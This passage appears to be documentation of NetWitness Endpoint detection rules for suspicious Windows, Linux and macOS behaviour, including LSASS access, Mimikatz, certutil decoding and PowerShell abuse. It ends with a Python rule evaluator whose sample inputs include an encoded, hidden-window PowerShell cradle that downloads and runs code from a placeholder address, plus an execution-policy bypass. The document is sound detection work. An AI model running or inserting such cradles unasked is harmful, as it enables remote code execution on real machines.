GENERATED META KEYS
* analysis.file = powershell double base64

Powershell Injects Remote Process (powershell_injects_remote_process)
Powershell injecting into a remote process can be an indication of someone trying to create and run malicious processes remotely, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = powershell injects remote process

Powershell Opens LSASS Process (powershell_opens_lsass_process)
Powershell running the LSASS process can be an indication of someone trying to dump credentials locally or remotely, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = powershell opens lsass process

Powershell Runs Command Prompt (powershell_runs_command_prompt)
Powershell running the command prompt can be an indication of someone trying to run malicious commands to compromise the system or the user, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = powershell runs command prompt

Powershell Runs Scripting Engine (powershell_runs_scripting_engine)
Powershell running a scripting engine can be an indication of someone trying to run malicious scripts to compromise the system or the user, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = powershell runs scripting engine

Process Authorized In Firewall (process_authorized_in_firewall)
The firewall allows process access based on details about the process and the access control policy in use.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = process authorized in firewall

Process Redirects to STDOUT or STDERR (process_redirects_to_stdout_or_stderr)
This will return any process event that contains the launch argument '2>&1', which redirects STDERR into STDOUT (merging the two streams).

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = process redirects to stdout or stderr

Psexesvc Runs Powershell (psexesvc_runs_powershell)
Psexesvc running powershell can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = psexesvc runs powershell

Psexesvc Runs Scripting Engine (psexesvc_runs_scripting_engine)
Psexesvc running a scripting engine can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = psexesvc runs scripting engine

Psexesvc Runs Shell Commands (psexesvc_runs_shell_commands)
Psexesvc running shell commands can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = psexesvc runs shell commands

Queries Cached Kerberos Tickets (queries_cached_kerberos_tickets)
Querying cached Kerberos tickets can be an attempt to obtain account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform lateral movement and access restricted information.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries cached kerberos tickets

Queries Processes On Local System (queries_processes_on_local_system)
Querying processes on the local system can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries processes on local system

Queries Processes On Remote System (queries_processes_on_remote_system)
Querying processes on a remote system can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries processes on remote system

Queries Registry Using Command-Line Registry Tool (queries_registry_using_command-line_registry_tool)
Querying the registry using the command-line registry tool can be an indication of adversaries trying to interact with the Windows Registry to gather information about the system, configuration, and installed software.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries registry using command-line registry tool

Queries Terminal Sessions (queries_terminal_sessions)
Querying terminal sessions can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries terminal sessions

Queries Users Logged On Local System (queries_users_logged_on_local_system)
Querying users logged on to the local system can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries users logged on local system

Queries Users Logged On Remote System (queries_users_logged_on_remote_system)
Querying users logged on to a remote system can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries users logged on remote system

RDP Launching Loopback Address (rdp_launching_loopback_address)
This rule detects an attempt to set up RDP over an SSH tunnel. A compromised system could be using localhost to forward an RDP session to itself for use by an attacker.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = rdp launching loopback address

Record Screen Captures Using PSR Tool (record_screen_captures_using_psr_tool)
Recording screen captures using the PSR tool can be an indicator of adversaries attempting to take screen captures of the desktop to gather information over the course of an operation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = record screen captures using psr tool

Registers Shim Database (registers_shim_database)
The Microsoft Windows Application Compatibility Toolkit (ACT) enables shims to be used to provide backwards compatibility for older versions of Windows or legacy applications. Malicious actors may use shims to gain persistence or elevate privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = registers shim database

Registry Tools Disabled (registry_tools_disabled)
An administrative user has disabled access to the registry editor.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = registry tools disabled

Regsvr32 Creates Windows Task (regsvr32_creates_windows_task)
Regsvr32.exe is a command-line program used to register and unregister object linking controls, such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. Regsvr32 creating a Windows task could allow an attacker to gain control of the system by running malicious code.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 creates windows task

Regsvr32 Runs Powershell (regsvr32_runs_powershell)
Regsvr32.exe is a command-line program used to register and unregister object linking controls, such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 runs powershell

Regsvr32 Runs Rundll32 (regsvr32_runs_rundll32)
Regsvr32.exe is a command-line program used to register and unregister object linking controls, such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. This rule detects unusual behavior in the form of registration and execution of a DLL in the same command.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 runs rundll32

Regsvr32 Writes Executable (regsvr32_writes_executable)
Regsvr32.exe is a command-line program used to register and unregister object linking controls, such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. Regsvr32 writing an executable could indicate delivery of a backdoor to the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 writes executable

Remote Directory Traversal (remote_directory_traversal)
Adversaries can enumerate remote share directories and files. This can be used for reconnaissance, discovery and collection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = remote directory traversal

RPM Hash Mismatch (rpm_hash_mismatch)
A hash mismatch may indicate a file has been altered from its original state and calls into question its integrity. Since RPMs typically contain compiled software, this could mean an attacker is trying to disguise malware as legitimate.

RPM Hash Mismatch In Important System Directory (rpm_hash_mismatch_in_important_system_directory)
A hash mismatch may indicate a file has been altered from its original state and calls into question its integrity. Since RPMs typically contain compiled software, this could mean an attacker is trying to disguise malware as legitimate.

RPM Ownership Changed (rpm_ownership_changed)
This rule will trigger for any change in ownership of executables linked to RPM installations. Adversaries can use changed ownership for evading defenses implemented by access controls.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = rpm ownership changed

RPM Permissions Changed (rpm_permissions_changed)
This rule will trigger for any change in permissions of executables linked to RPM installations. Adversaries can use changed permissions for evading defenses implemented by access controls.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = rpm permissions changed

Rundll32 Creates Windows Task (rundll32_creates_windows_task)
The Rundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = rundll32 creates windows task

Rundll32 Runs Powershell (rundll32_runs_powershell)
The Rundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = rundll32 runs powershell

Runs ACL Management Tool (runs_acl_management_tool)
Running an ACL management tool can be an indication of someone trying to run the multiple malicious commands needed to perform a multi-stage attack to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs acl management tool

Runs Active Directory Service Query Tool (runs_active_directory_service_query_tool)
Running an Active Directory service query tool can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs active directory service query tool

Runs Binary Located In Recycle Bin Directory (runs_binary_located_in_recycle_bin_directory)
A technique has been used by malware authors where a malicious file or process is invoked and running out of the $RECYCLE.BIN folder on Windows systems.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs binary located in recycle bin directory

Runs Binary Located In Root Of Logical Drive (runs_binary_located_in_root_of_logical_drive)
While the majority of programs are stored in folders on a system, it is uncommon to see a binary in the root of the "C:" directory.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of logical drive

Runs Binary Located In Root Of Program Directory (runs_binary_located_in_root_of_program_directory)
With ProgramData being hidden in Windows by default, the main use of this folder is for application data that is not user specific, meaning that it applies to "All Users". If malware were placed here, it would run for any user who logged into the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of program directory

Runs Binary Located In Root Of Users Directory (runs_binary_located_in_root_of_users_directory)
While the majority of programs are stored in folders on a system, it is uncommon to see a binary in the root of a user's home directory, and this location is sometimes used by malware.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of users directory

Runs Binary Located In System Volume Information Directory (runs_binary_located_in_system_volume_information_directory)

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs binary located in system volume information directory

Runs Blacklisted File (runs_blacklisted_file)
An analyst may mark files as blacklisted within NetWitness Endpoint. If actions on an endpoint involve those blacklisted files as the destination process, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs blacklisted file

Runs Certutil With Decode Arguments (runs_certutil_with_decode_arguments)
CertUtil, the Windows certificate management utility, can install, back up, delete, manage, and perform various functions related to certificates and certificate stores in Windows. Running certutil with the decode argument can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with decode arguments

Runs Certutil With Encode Arguments (runs_certutil_with_encode_arguments)
CertUtil, the Windows certificate management utility, can install, back up, delete, manage, and perform various functions related to certificates and certificate stores in Windows. Running certutil with the encode argument can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with encode arguments

Runs Certutil With Hashfile Arguments (runs_certutil_with_hashfile_arguments)
CertUtil, the Windows certificate management utility, can install, back up, delete, manage, and perform various functions related to certificates and certificate stores in Windows. Running certutil with the hashfile argument can be an indication of someone trying to obfuscate malicious files to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with hashfile arguments

Runs Chained Command Shell (runs_chained_command_shell)
Running a chained command shell can be an indication of someone trying to run the multiple malicious commands needed to perform a multi-stage attack to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs chained command shell

Runs Chmod (runs_chmod)
Chmod is used to modify file and directory permissions.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs chmod

Runs Credential Dumping Tools (runs_credential_dumping_tools)
Running credential dumping tools can be an indication of someone trying to bypass all credential checks to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = loads credential dumping library

Runs Curl (runs_curl)
Curl is used in command lines or scripts to transfer data via URLs.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs curl

Runs Ditto (runs_ditto)
Ditto copies files and directories from the Mac terminal.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ditto

Runs DNS Lookup Tool (runs_dns_lookup_tool)
Running nslookup.exe can be used to get information about the Domain Name System (DNS) being used by the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs dns lookup tool

Runs File Attributes Modification Tool (runs_file_attributes_modification_tool)
Running a file attributes modification tool can be an indication of adversaries trying to use this to their advantage to hide files and folders anywhere on the system for persistence, evading a typical user or system analysis that does not incorporate investigation of hidden files.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs file attributes modification tool

Runs File Transfer Tool (runs_file_transfer_tool)
Running a file transfer program can be an indication of an adversary potentially performing data exfiltration to an off-site location.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs file transfer tool

Runs forfiles.exe (runs_forfiles.exe)
Running forfiles.exe can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or to make forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs forfiles.exe

Runs Graylisted File (runs_graylisted_file)
An analyst may mark files as graylisted within NetWitness Endpoint. If actions on an endpoint involve those graylisted files as the destination process, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs graylisted file

Runs Ifconfig (runs_ifconfig)
The ifconfig utility is used to assign an address to a network interface or configure network interface parameters.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ifconfig

Runs Kextload (runs_kextload)
The kextload program is used to load kernel extensions (kexts). For most kexts, kextload must run as the superuser.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs kextload

Runs Kextstat (runs_kextstat)
Kextstat displays the status of loaded kernel extensions (kexts).

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs kextstat

Runs Launchctl (runs_launchctl)
Launchctl is used to control services.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs launchctl

Runs Malicious File By Reputation Service (runs_malicious_file_by_reputation_service)
This rule indicates execution of files whose hashes are tagged as malicious by the reputation service.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = runs malicious file by reputation service

Runs Mshta With HTTP Argument (runs_mshta_with_http_argument)
Mshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run with an HTTP argument.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs mshta with http argument

Runs Mshta With Script Argument (runs_mshta_with_script_argument)
Mshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run with a script argument.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs mshta with script argument
Runs Msiexec with HTTP Argument (runs_msiexec_with_http_argument)
Windows Installer (msiexec.exe) accepts an HTTP URL as the package to install, so it can be used from the command line to download and install, or modify, malicious applications.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs msiexec with http argument
Runs Netstat (runs_netstat)
Netstat is a network utility that displays active connections, listening ports, routing tables and interface statistics; it can be used to discover network topology, statistics and performance information.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs netstat
Runs Network Configuration Tool (runs_network_configuration_tool)
Netsh.exe is a command-line utility that displays or changes the network configuration of a local or remote computer.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs network configuration tool
Runs Network Connectivity Tool (runs_network_connectivity_tool)
Running a network connectivity tool can indicate someone probing the system or the network for potential attack vectors, which can then be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs network connectivity tool
Runs One Letter Executable (runs_one_letter_executable)
A single-letter file name can be an indicator of malware or an attacker tool. When an attacker has remote access to a machine, they want to limit the amount of typing needed and will at times name a script or program with a single letter for quicker access.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs one letter executable
Runs One Letter Script (runs_one_letter_script)
A single-letter file name can be an indicator of malware or an attacker tool. When an attacker has remote access to a machine, they want to limit the amount of typing needed and will at times name a script or program with a single letter for quicker access.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs one letter script
Runs Ping (runs_ping)
Ping is used to check whether a host is reachable on a network.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ping
Runs Powershell (runs_powershell)
Both commodity cyber criminals and targeted attackers make heavy use of PowerShell, as its flexibility makes it an ideal attack tool on Windows systems. Running PowerShell can be an indication of someone trying to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs powershell
Runs Powershell Bypassing Execution Policy (runs_powershell_bypassing_execution_policy)
Running PowerShell with the execution policy bypassed (for example -ExecutionPolicy Bypass) ignores the execution policy restrictions so that arbitrary scripts run regardless of policy. This can be used to exploit the system, gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell bypassing execution policy
Runs Powershell Decoding Base64 String (runs_powershell_decoding_base64_string)
Running PowerShell that decodes a base64 string (for example with [Convert]::FromBase64String) can be an indication of someone obfuscating malicious commands to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell decoding base64 string
Runs Powershell Defining Function (runs_powershell_defining_function)
Running PowerShell that defines functions on the command line can be an indication of someone trying to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell defining function
Runs Powershell Downloading Content (runs_powershell_downloading_content)
Attackers commonly use PowerShell as a downloader on Windows systems (for example Net.WebClient DownloadString/DownloadFile or Invoke-WebRequest). Running PowerShell to download content can be an indication of someone fetching malicious payloads from the internet to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell downloading content
Runs Powershell Invoke-Mimikatz Function (runs_powershell_invoke-mimikatz_function)
Mimikatz has become an extremely effective credential-theft tool against Windows hosts. Running the PowerShell Invoke-Mimikatz function is an indication of someone using Mimikatz to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = runs powershell invoke-mimikatz function
Runs Powershell Memory Stream Function (runs_powershell_memory_stream_function)
Running PowerShell that uses a memory stream (System.IO.MemoryStream) can be an indication of someone decompressing or staging a payload entirely in memory so that nothing touches disk, in order to exploit the system, gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell memory stream function
Runs Powershell ShellExecute Function (runs_powershell_shellexecute_function)
Running PowerShell that calls the ShellExecute function can be an indication of someone launching further programs or scripts from PowerShell to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell shellexecute function
Runs Powershell Using Encoded Command (runs_powershell_using_encoded_command)
Running PowerShell with an encoded command (-EncodedCommand, a base64-encoded UTF-16LE script) can be an indication of someone obfuscating malicious commands to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell using encoded command
Runs Powershell Using Environment Variables (runs_powershell_using_environment_variables)
Running PowerShell that references environment variables (such as $env:PATH or $env:TEMP) can be an indication of someone running malicious commands whose locations or values are supplied through variables rather than literal paths, to exploit the system, gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell using environment variables
Runs Powershell With Hidden Window (runs_powershell_with_hidden_window)
Running PowerShell with a hidden window (-WindowStyle Hidden) can be an indication of someone running malicious commands stealthily, so that no PowerShell window is visible to the user, to exploit the system, gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with hidden window
Runs Powershell With HTTP Argument (runs_powershell_with_http_argument)
Running PowerShell with an HTTP URL as an argument can be an indication of someone fetching and running commands or downloaders from the internet, which can be further used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with http argument
Runs Powershell With Long Arguments (runs_powershell_with_long_arguments)
Running PowerShell with unusually long arguments (typically an encoded or obfuscated payload passed on the command line) can be an indication of someone running malicious PowerShell commands, which can be further used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with long arguments
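The PowerShell rules above all key on the shape of the powershell.exe command line. The following is an added example, not RSA's rule implementation and not code from the page: a small evaluator that applies those rules to a command line and emits the same meta key names (analysis.file, boc, ioc) the table lists. The sample command lines are constructed here, the 198.51.100.7 address is a documentation placeholder, and the 1000-character threshold for "long arguments" is an assumption, since the page does not state the rule's threshold. The one point worth showing beyond simple matching is that the -EncodedCommand payload is base64 of UTF-16LE text, so the evaluator decodes it and runs the download and HTTP rules over the decoded script as well.

```python
import base64
import re

# Constructed sample powershell.exe command lines (not real telemetry). The
# second one carries an -EncodedCommand payload built here from a download cradle.
CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/a")'
SAMPLE_EVENTS = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Temp\setup.ps1",
    "powershell.exe -w hidden -enc "
    + base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii"),
    r'powershell.exe -c "[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($env:x))"',
    r"powershell.exe -Command Get-ChildItem C:\Users",
    'powershell.exe -c "' + "Write-Host 'x'; " * 100 + '"',
]

# Matches -e, -ec, -enc, -encodedcommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (meta key, meta value, pattern); the values mirror the GENERATED META KEYS above.
POWERSHELL_RULES = [
    ("boc", "runs powershell bypassing execution policy",
     re.compile(r"-e(?:x[a-z]*|p)\s+bypass", re.I)),          # -ex, -exec, -ep, -executionpolicy
    ("boc", "runs powershell with hidden window",
     re.compile(r"-w(?:i[a-z]*)?\s+hidden", re.I)),            # -w, -win, -windowstyle
    ("boc", "runs powershell using encoded command", ENCODED_RE),
    ("boc", "runs powershell decoding base64 string",
     re.compile(r"FromBase64String", re.I)),
    ("boc", "runs powershell downloading content",
     re.compile(r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)),
    ("boc", "runs powershell with http argument", re.compile(r"https?://", re.I)),
    ("boc", "runs powershell using environment variables",
     re.compile(r"\$env:|%[A-Za-z_]+%", re.I)),
    ("boc", "runs powershell defining function",
     re.compile(r"\bfunction\s+[A-Za-z_][\w-]*", re.I)),
    ("boc", "runs powershell memory stream function",
     re.compile(r"IO\.MemoryStream", re.I)),
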